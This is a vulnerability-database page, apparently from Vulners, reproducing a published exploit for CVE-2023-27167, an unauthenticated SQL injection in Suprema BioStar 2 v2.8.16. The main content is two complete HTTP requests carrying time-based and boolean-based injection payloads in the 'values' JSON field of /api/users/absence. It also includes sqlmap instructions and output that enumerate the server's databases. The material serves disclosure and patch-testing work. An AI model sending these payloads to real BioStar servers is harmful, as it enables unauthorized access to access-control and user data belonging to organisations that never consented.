Vulners
Lucene search
Suprema BioStar 2 2.8.16 SQL Injection
🗓️ 27 Mar 2023 00:00:00Reported by Yuriy TsarenkoType 
packetstorm🔗 packetstormsecurity.com👁 238 Views
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Suprema BioStar 2 v2.8.16 - SQL Injection Vulnerability | 8 Apr 202300:00 | – | zdt |
 | CVE-2023-27167 | 29 Mar 202320:20 | – | circl |
 | Suprema BioStar 2 SQL注入漏洞 | 29 Mar 202300:00 | – | cnnvd |
 | CVE-2023-27167 | 29 Mar 202300:00 | – | cve |
 | CVE-2023-27167 | 29 Mar 202300:00 | – | cvelist |
 | Suprema BioStar 2 v2.8.16 - SQL Injection | 8 Apr 202300:00 | – | exploitdb |
 | EUVD-2023-30947 | 3 Oct 202520:07 | – | euvd |
 | Suprema BioStar 2 | 26 Sep 202306:00 | – | ics |
 | CVE-2023-27167 | 29 Mar 202317:15 | – | nvd |
 | CVE-2023-27167 | 29 Mar 202317:15 | – | osv |
10
`# Exploit Title: CVE-2023-27167 - Suprema BioStar 2 v2.8.16 - SQL Injection
# Date: 26/03/2023
# Exploit Author: Yuriy (Vander) Tsarenko (https://www.linkedin.com/in/yuriy-tsarenko-a1453aa4/)
# Vendor Homepage: https://www.supremainc.com/
# Software Link: https://www.supremainc.com/en/platform/hybrid-security-platform-biostar-2.asp
# Software Download: https://support.supremainc.com/en/support/solutions/articles/24000076543--biostar-2-biostar-2-8-16-new-features-and-configuration-guide
# Version: 2.8.16
# Tested on: Windows, Linux
## Description
A Boolean-based SQL injection/Time based SQL vulnerability in the page (/api/users/absence?search_month=1) in Suprema BioStar 2 v2.8.16 allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "values" JSON parameter.
## Request PoC #1
'''
POST /api/users/absence?search_month=1 HTTP/1.1
Host: biostar2.server.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/json;charset=UTF-8
content-language: en
bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548
Content-Length: 204
Origin: https://biostar2.server.net
Connection: close
Referer: https://biostar2.server.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(4)))a)",4840,20120]}],"orders":[],"total":false}}
'''
Time based SQL injection (set 4 – response delays for 8 seconds).
'''
## Request PoC #2
'''
POST /api/users/absence?search_month=1 HTTP/1.1
Host: biostar2.server.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/json;charset=UTF-8
content-language: en
bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548
Content-Length: 188
Origin: https://biostar2.server.net
Connection: close
Referer: https://biostar2.server.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}
'''
Boolean-based SQL injection (payload “1 and 3523=03523” means “1 and True”, so we can see information in response, regarding user with id 1, which is admin)
'''
## Exploit with SQLmap
Save the request from Burp Suite to file.
'''
---
Parameter: JSON #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(7)))a)",4840,20120]}],"orders":[],"total":false}}
---
[05:02:49] [INFO] testing MySQL
[05:02:49] [INFO] confirming MySQL
[05:02:50] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL > 5.0.0 (MariaDB fork)
[05:02:50] [INFO] fetching database names
[05:02:50] [INFO] fetching number of databases
[05:02:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[05:02:55] [INFO] retrieved: 2
[05:03:12] [INFO] retrieved: biostar2_ac
[05:03:56] [INFO] retrieved: information_schema
available databases [2]:
[*] biostar2_ac
[*] information schema
'''
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Mar 2023 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.00575